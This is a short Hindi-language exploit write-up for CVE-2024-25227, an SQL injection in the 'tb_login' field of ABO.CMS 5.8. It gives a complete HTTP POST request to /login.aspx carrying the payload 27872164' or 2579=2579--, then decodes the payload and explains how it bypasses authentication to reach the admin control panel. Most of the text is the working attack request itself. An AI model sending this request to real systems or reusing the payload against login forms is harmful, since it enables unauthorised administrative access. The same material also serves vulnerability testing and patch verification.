
CVE-2024-25227 एक्सप्लॉइट
CVE-2024-25227, ABO.CMS 5.8 में "tb_login" पैरामीटर में पाई गई एक SQLi भेद्यता है।
POST /login.aspx HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/535.36 (KHTML, like Gecko) Chrome/104.0.5735.134 Safari/527.36
Connection: close
Cache-Control: max-age=0
Cookie: ASP.NET_SessionId=asd123hstjj
Origin: http://localhost
Upgrade-Insecure-Requests: 1
Referer: http://ip
Content-Type: application/x-www-form-urlencoded
Content-Length: 100
VIEWSTATE=%2ASDkjdkjfkgajsslfk&EVENTVALIDATION=%2;llkfopkorjaeitjru123&tb_login=27872164'%20or%202579%3d2579--%20&tb_pwd=hf%36nb4u%84X5&b_submit=+%C3+%D7+%CE+%C5+
पेलोड tb_login=27872164'%20or%202579%3d2579--%20 है, जो URL एन्कोडिंग के बिना इस प्रकार है: 27872164' or 2579=2579--
संशोधित अनुरोध में पेलोड के साथ, आप बैकएंड को बता रहे हैं कि प्लेसहोल्डर "27872164'" को एक ऐसी शर्त के साथ जोड़ा जाता है जो हमेशा सत्य ("2579=2579") होती है, और क्वेरी के बाकी सभी भाग को "--" के साथ कमेंट कर दिया जाता है ताकि यह सुनिश्चित हो सके कि संशोधित क्वेरी इंजेक्ट हो जाए। यह प्रभावी रूप से "tb_login" फ़ील्ड से संबंधित सभी प्रमाणीकरण जाँचों को बायपास कर देता है, जिससे एडमिन के रूप में नियंत्रण कक्ष तक बिना प्रमाणीकरण के पहुँच संभव हो जाती है।